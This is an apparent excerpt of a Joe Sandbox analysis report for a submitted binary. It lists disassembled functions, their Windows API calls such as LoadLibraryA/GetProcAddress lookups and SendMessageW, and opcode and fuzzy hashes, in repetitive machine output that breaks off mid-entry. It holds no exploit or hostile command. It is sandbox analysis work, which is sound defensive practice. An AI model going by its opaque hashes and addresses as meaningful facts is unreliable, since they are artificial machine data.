                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$MoveWindow
                                                                            • String ID: Listbox
                                                                            • API String ID: 3315199576-2633736733
                                                                            • Opcode ID: 5c1d4ea9065de6bf65d8dd6929adbeeae2e8f8ced06e81fc8dd946540328514b
                                                                            • Instruction ID: 14d0d190b6d4923d63266ba9efd70e1379e0db22b4dc19a419c4624b88085633
                                                                            • Opcode Fuzzy Hash: 5c1d4ea9065de6bf65d8dd6929adbeeae2e8f8ced06e81fc8dd946540328514b
                                                                            • Instruction Fuzzy Hash: 50218332610118BFDF168F54CC85FBB3BAEEF89764F118129F9549B194C6719C5187A0
                                                                            Function 0036A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0036A46D
                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0036A482
                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0036A48F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: msctls_trackbar32
                                                                            • API String ID: 3850602802-1010561917
                                                                            • Opcode ID: 3cc3b339004ceaad65cd3814fa12680069fe8f267f8071916da95f861f87dc96
                                                                            • Instruction ID: e3cfdb81e1a70cf50f6fcde699f1cb8371a524ad5dc59b24608676e9ecc8f46a
                                                                            • Opcode Fuzzy Hash: 3cc3b339004ceaad65cd3814fa12680069fe8f267f8071916da95f861f87dc96
                                                                            • Instruction Fuzzy Hash: 1A11E771200208BEEF265F65CC46FEB3B6DEF89754F024118FB45A6191DAB2E811DB24
                                                                            Function 00322287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00322350,?), ref: 003222A1
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 003222A8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RoInitialize$combase.dll
                                                                            • API String ID: 2574300362-340411864
                                                                            • Opcode ID: 774ddc13093d0444474a876f3e0c2d0ad2ec830d814a990971d559ae4ca3fc6a
                                                                            • Instruction ID: 122f36bf97a01807a0ddb7523855ea5240295014dc093846bc73adf2127c348d
                                                                            • Opcode Fuzzy Hash: 774ddc13093d0444474a876f3e0c2d0ad2ec830d814a990971d559ae4ca3fc6a
                                                                            • Instruction Fuzzy Hash: 43E01A74A90740EBDB676F70EC8DF55376CAB00B06F104460F202D50E0CBB99040DF04
                                                                            Function 0032235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00322276), ref: 00322376
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0032237D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RoUninitialize$combase.dll
                                                                            • API String ID: 2574300362-2819208100
                                                                            • Opcode ID: 9aabca3326a95b18fe1116921784baa271a437651553d1598ed19bfb19f98d10
                                                                            • Instruction ID: 7c92e946fd7555359f38939113bae47d72a92a4ccf221b78c1f5018271e1d4aa
                                                                            • Opcode Fuzzy Hash: 9aabca3326a95b18fe1116921784baa271a437651553d1598ed19bfb19f98d10
                                                                            • Instruction Fuzzy Hash: F5E09278544744EFDA27AFA1ED0DF457B6CBB00706F150454F20AD20F0CBB8A4009B14
                                                                            Function 0037AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: LocalTime__swprintf
                                                                            • String ID: %.3d$WIN_XPe
                                                                            • API String ID: 2070861257-2409531811
                                                                            • Opcode ID: f9bf2f5d32081984ef534c6aac24423f1a862dda7312d32c94e83e9496d8f7ad
                                                                            • Instruction ID: 0887a9e8d86a7de9af273025debbe7aeaab1836db6662856a3359cebc06814c1
                                                                            • Opcode Fuzzy Hash: f9bf2f5d32081984ef534c6aac24423f1a862dda7312d32c94e83e9496d8f7ad
                                                                            • Instruction Fuzzy Hash: B1E01271804A29FBCB279750DD05DFD73BCA788741F1044D2F90AE1804E7399B84AB17
                                                                            Function 00362205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,003621FB,?,003623EF), ref: 00362213
                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00362225
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetProcessId$kernel32.dll
                                                                            • API String ID: 2574300362-399901964
                                                                            • Opcode ID: fb8650e2f0348ea4a4de852ac57e7f8a57c4e9c671f8558e39b2f38f35ae9c84
                                                                            • Instruction ID: f4d1d0d1877ac1772bcc9f05caf0beed4bf44ccdc837712be1defb39e21989a1
                                                                            • Opcode Fuzzy Hash: fb8650e2f0348ea4a4de852ac57e7f8a57c4e9c671f8558e39b2f38f35ae9c84
                                                                            • Instruction Fuzzy Hash: 3ED0A734900B169FC7635F31F80C68377D8EF05704F02885AE842E2590D770D8808760
                                                                            Function 003042F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,003042EC,?,003042AA,?), ref: 00304304
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00304316
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 2574300362-1355242751
                                                                            • Opcode ID: 008d722bccc2a1f4737c73f3ba3cbf438eea2318aba1e212af16598369f661d7
                                                                            • Instruction ID: 84d72c523bd8051cb7b060fa93ce1a12ca752b616adaacfa951da8c20dca2768
                                                                            • Opcode Fuzzy Hash: 008d722bccc2a1f4737c73f3ba3cbf438eea2318aba1e212af16598369f661d7
                                                                            • Instruction Fuzzy Hash: 9CD0A774804712AFC7635F25EC0C68277D8AF04705F014499E642D25F0D7B0C8808710
                                                                            Function 0030434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,003041BB,00304341,?,0030422F,?,003041BB,?,?,?,?,003039FE,?,00000001), ref: 00304359
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0030436B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 2574300362-3689287502
                                                                            • Opcode ID: b342289c930b2917044c107d34ed385ca14c18a03390a987990e6728ca3e1a9b
                                                                            • Instruction ID: 5823ab87ccbdc0f7c93c770216805e6e7ab3ec6e78b65a40070b5f8811a6ee8e
                                                                            • Opcode Fuzzy Hash: b342289c930b2917044c107d34ed385ca14c18a03390a987990e6728ca3e1a9b
                                                                            • Instruction Fuzzy Hash: 70D0A774800712AFC7335F31E80C68377D8AF10719F014599E582D25D0D7B0D8808B10
                                                                            Function 00340539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(oleaut32.dll,?,0034051D,?,003405FE), ref: 00340547
                                                                            • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00340559
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                            • API String ID: 2574300362-1071820185
                                                                            • Opcode ID: 6c2c15b1bb4b92873834c5705845d7545dccd9fae360ee38655cd5840653533b
                                                                            • Instruction ID: 4bdcdd415c0625cdaa1a05dd18b375e0d17cefd4056871f666f5aa3989ffdb1b
                                                                            • Opcode Fuzzy Hash: 6c2c15b1bb4b92873834c5705845d7545dccd9fae360ee38655cd5840653533b
                                                                            • Instruction Fuzzy Hash: C0D0A7305047129FC7229F21F80C69677E8EF01705F11C89DE54BD25A0D670D8808B10
                                                                            Function 00340564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0034052F,?,003406D7), ref: 00340572
                                                                            • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00340584
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                            • API String ID: 2574300362-1587604923
                                                                            • Opcode ID: 24b30c33d57cb2d368c6468c3448a723f00ffa73b6b9846c15c647382f4b08da
                                                                            • Instruction ID: a6ef2ea97cfc3639ff3fbca88d792004f1f6d962882002af192c360349d79fbb
                                                                            • Opcode Fuzzy Hash: 24b30c33d57cb2d368c6468c3448a723f00ffa73b6b9846c15c647382f4b08da
                                                                            • Instruction Fuzzy Hash: 88D0A7315047129FC7225F30E84CB9377E8EF05704F11869DEA42D2590D770D4C08B20
                                                                            Function 0035ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,0035ECBE,?,0035EBBB), ref: 0035ECD6
                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0035ECE8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                            • API String ID: 2574300362-1816364905
                                                                            • Opcode ID: cd0ac72b49866e7a150c181ba8312fda6c88e9c327e0200c3094296b2fdeb531
                                                                            • Instruction ID: 3d7987874a22d5087eeb03330856318abd3c3b91ee2b443b094d14d953fcd8d0
                                                                            • Opcode Fuzzy Hash: cd0ac72b49866e7a150c181ba8312fda6c88e9c327e0200c3094296b2fdeb531
                                                                            • Instruction Fuzzy Hash: 59D0A730800723AFCB275F61E84CA8377E8AF00705F018459FC56D25A1DB70C8848B10
                                                                            Function 0035BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0035BAD3,00000001,0035B6EE,?,0039DC00), ref: 0035BAEB
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0035BAFD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                            • API String ID: 2574300362-199464113
                                                                            • Opcode ID: 447ee8c31046d91e2249caf81530f92279403f35f2240bdd0f04b10a46222f6d
                                                                            • Instruction ID: d179ef805156dc74c9ee7dda3f71361055ea4cb0cacef538a4ecd5420a4a47f9
                                                                            • Opcode Fuzzy Hash: 447ee8c31046d91e2249caf81530f92279403f35f2240bdd0f04b10a46222f6d
                                                                            • Instruction Fuzzy Hash: 02D05E308047129EC7326F22A848E92B7D8AF00705F014459E943925A0D7B0C884C710
                                                                            Function 00363BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00363BD1,?,00363E06), ref: 00363BE9
                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00363BFB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                            • API String ID: 2574300362-4033151799
                                                                            • Opcode ID: 7d5af6dce54904ef2ca0354ff79e5aa3ae9821c1604724b2196b8e4f86817e86
                                                                            • Instruction ID: 06cf7dccd80837d7809211043e02d4887b3b356b7b23f2c243b1138189bc9686
                                                                            • Opcode Fuzzy Hash: 7d5af6dce54904ef2ca0354ff79e5aa3ae9821c1604724b2196b8e4f86817e86
                                                                            • Instruction Fuzzy Hash: B2D0A7705007129FC7225F60E80C7C3BBF8AF15718F118459F446E2590E7B0C4808F10
                                                                            Function 00339B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9c3f9c8b065563aa9533d551d097e8a805faaae77fe750ad50ee307dec0cd34d
                                                                            • Instruction ID: 211628f19557f973052883579023cbe48336d76d98cb9e1bae4fd087ff950831
                                                                            • Opcode Fuzzy Hash: 9c3f9c8b065563aa9533d551d097e8a805faaae77fe750ad50ee307dec0cd34d
                                                                            • Instruction Fuzzy Hash: 00C14A75A0021AEFCB15DF94C8C4BAEB7B9FF48700F11459AE906AB251D7B0DE81DB90
                                                                            Function 0035AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 0035AAB4
                                                                            • CoUninitialize.OLE32 ref: 0035AABF
                                                                              • Part of subcall function 00340213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0034027B
                                                                            • VariantInit.OLEAUT32(?), ref: 0035AACA
                                                                            • VariantClear.OLEAUT32(?), ref: 0035AD9D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                            • String ID:
                                                                            • API String ID: 780911581-0
                                                                            • Opcode ID: 3144860101b31f545afd278e3dbeec0217de8919d1c8504999e3a88e4a4d49a8
                                                                            • Instruction ID: fe73d5bdc7c7371d0e369f2a15d6971cc6f8606b3f435f433b87024286bce090
                                                                            • Opcode Fuzzy Hash: 3144860101b31f545afd278e3dbeec0217de8919d1c8504999e3a88e4a4d49a8
                                                                            • Instruction Fuzzy Hash: D5A15A35204B019FCB16EF14C491F5AB7E9BF88711F148549FA969B3A2CB30ED44DB86
                                                                            Function 003391CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$AllocClearCopyInitString
                                                                            • String ID:
                                                                            • API String ID: 2808897238-0
                                                                            • Opcode ID: d7a9352167d9e3336f2fa85c8e4d9aa67a2def53ad4299f414fec09b895141e8
                                                                            • Instruction ID: f7252fc46356b9ab72fca273dc3f2fd2b04b0d5d7dea5fd9e691fda38b075fcc
                                                                            • Opcode Fuzzy Hash: d7a9352167d9e3336f2fa85c8e4d9aa67a2def53ad4299f414fec09b895141e8
                                                                            • Instruction Fuzzy Hash: 3751B674A44706DBDB26AF66D4D176EB3E9EF48320F20881FE546CB6D1DBB498808701
                                                                            Function 0036C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowRect.USER32(00D27560,?), ref: 0036C544
                                                                            • ScreenToClient.USER32(?,00000002), ref: 0036C574
                                                                            • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0036C5DA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
